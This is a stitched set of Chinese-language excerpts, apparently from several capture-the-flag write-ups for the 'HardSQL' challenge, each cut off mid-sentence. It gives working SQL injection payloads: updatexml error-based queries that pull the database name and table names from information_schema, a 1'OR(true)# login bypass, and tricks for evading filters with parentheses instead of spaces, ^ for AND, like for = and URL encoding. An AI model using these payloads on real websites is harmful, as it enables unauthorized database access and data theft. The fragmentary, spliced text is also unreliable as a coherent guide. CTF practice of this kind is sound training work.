[极客大挑战2019]HardSQLStep尝试报错注入库名'or(updatexml(1,concat(0x7e,database()),0x7e))#表名'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),0))#列名'or(updatexml(1,co

SQL注入，猜测后台代码类似 SELECTidFROMtable_nameWHEREusername=input1ANDpassword=input2;发现过滤了空格比较符号和大部分函数名，但是没有过滤关键字。使用1'OR(true)#万能密码尝试登录，显示登录成功，判断可以进行布尔盲注。构造如下语句，更改left参数与减去的字符

题目环境：<br/>没错，又是我，这群该死的黑客竟然如此厉害，所以我回去爆肝SQL注入，这次，再也没有人能拿到我的flag了做了好多这个作者出的题了，看来又要上强度了判断注入类型username：adminpassword：1这里把参数password作为注入点<br/>1'<br/>单引号的字符型注入万能密码注

原理用fuzz字典来爆破哪些关键字被过滤了sql语句可以不用空格，仅用括号来隔开username=1'or(updatexml(1,concat(0x7e,database()),1))%23url编码一些值：%20空格%23#。。。and关键字可以用^来代替，=可以用like来代替。有时候不写空格也挺方便的，直接省略过滤空格的可能性截取字